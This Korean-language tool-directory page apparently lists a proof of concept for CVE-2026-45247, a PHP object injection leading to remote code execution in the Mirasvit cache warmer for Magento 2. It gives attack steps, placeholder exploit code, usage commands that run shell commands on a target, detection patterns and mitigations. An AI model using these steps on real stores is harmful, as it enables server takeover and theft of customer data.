Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — 기능적 PoC of CVE-2026-45247: Mirasvit Full Page Cache(Magento 2)에서 인증되지 않은 PHP Object Injection에서 RCE까지. | Kitploit
도구/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

기능적 PoC of CVE-2026-45247: Mirasvit Full Page Cache(Magento 2)에서 인증되지 않은 PHP Object Injection에서 RCE까지.

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-45247 - Magento 2용 Mirasvit Full Page Cache Warmer - PHP 객체 주입 → RCE

CVE-2026-45247 CVSS CISA KEV

📋 설명

CVE-2026-45247은 Magento 2 및 Adobe Commerce용 Mirasvit Full Page Cache Warmer 확장 프로그램에서 발생하는 치명적인 PHP 객체 주입(PHP Object Injection) 취약점입니다. 인증되지 않은 공격자는 CacheWarmer 쿠키에 조작된 직렬화된 PHP 객체를 전송하여 **원격 코드 실행(RCE)**을 달성할 수 있습니다.

이 취약점은 PHP 네이티브 unserialize() 함수에 대한 제한 없는 호출과 Magento 및 해당 종속성(특히 Monolog)에서 사용 가능한 가젯 체인(gadget chains)이 결합되어 발생합니다.

속성값
CVECVE-2026-45247
제품Magento 2용 Mirasvit Full Page Cache Warmer
영향받는 버전1.11.12 미만의 모든 버전
사용 가능한 패치버전 1.11.12 (2026년 5월 25일)
CVSS 점수9.8 (치명적)
벡터AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA KEV 상태활성 익스플로잇 확인됨 (2026년 6월 3일 추가됨)
마감일2026년 6월 6일

🚨 공격 메커니즘

  1. 이 확장 프로그램은 모든 상점 요청에서 CacheWarmer 쿠키를 처리합니다.
  2. 쿠키 값은 필터링 없이 unserialize()에 전달됩니다.
  3. 공격자는 악의적인 직렬화된 PHP 객체를 전송합니다.
  4. Monolog의 가젯 체인(SyslogUdpHandler, BufferHandler, FingersCrossedHandler)을 사용하여 RCE를 달성합니다.
  5. 명령은 웹 서비스 권한으로 서버에서 실행됩니다.

⚙️ 공격 단계

1단계: 정찰

root@kitploit:~
# 스토어에서 Mirasvit Cache Warmer를 사용하는지 확인
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

2단계: 취약점 분석

root@kitploit:~
# 이 쿠키는 인증 없이 모든 요청에서 처리됩니다
# Mirasvit의 취약한 코드:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # 위험!

3단계: 익스플로잇 실행

root@kitploit:~
# 악성 쿠키 구성
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# 요청 전송
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ PoC 사용

설치

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

기본 실행

root@kitploit:~
# 취약점 확인
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# 'id' 명령 실행
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# 사용자 지정 명령 실행
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# 디버깅에 프록시 사용
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

빠른 스크립트

root@kitploit:~
# bash 스크립트로 확인
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 입증된 영향

  • Magento 서버에서 원격 명령 실행(RCE)
  • 고객 및 주문 데이터베이스에 대한 전체 액세스
  • 지속성을 위한 웹셸(webshell) 설치
  • 온라인 상점의 완전한 침해
  • 신용카드 데이터의 잠재적 유출
  • 기업 인프라 내 측면 이동(lateral movement)

🛡️ 탐지

침해 지표(IOC)

액세스 로그에서:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

익스플로잇에서 관찰된 명령:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

사용된 가젯 체인:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 완화 조치

즉시 업데이트

root@kitploit:~
# 패치된 버전으로 업데이트
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

임시 완화 조치

root@kitploit:~
# .htaccess 또는 nginx에서 CacheWarmer 쿠키 차단
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// app/code/local/Custom/BlockCookie.php에서
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
도구 다운로드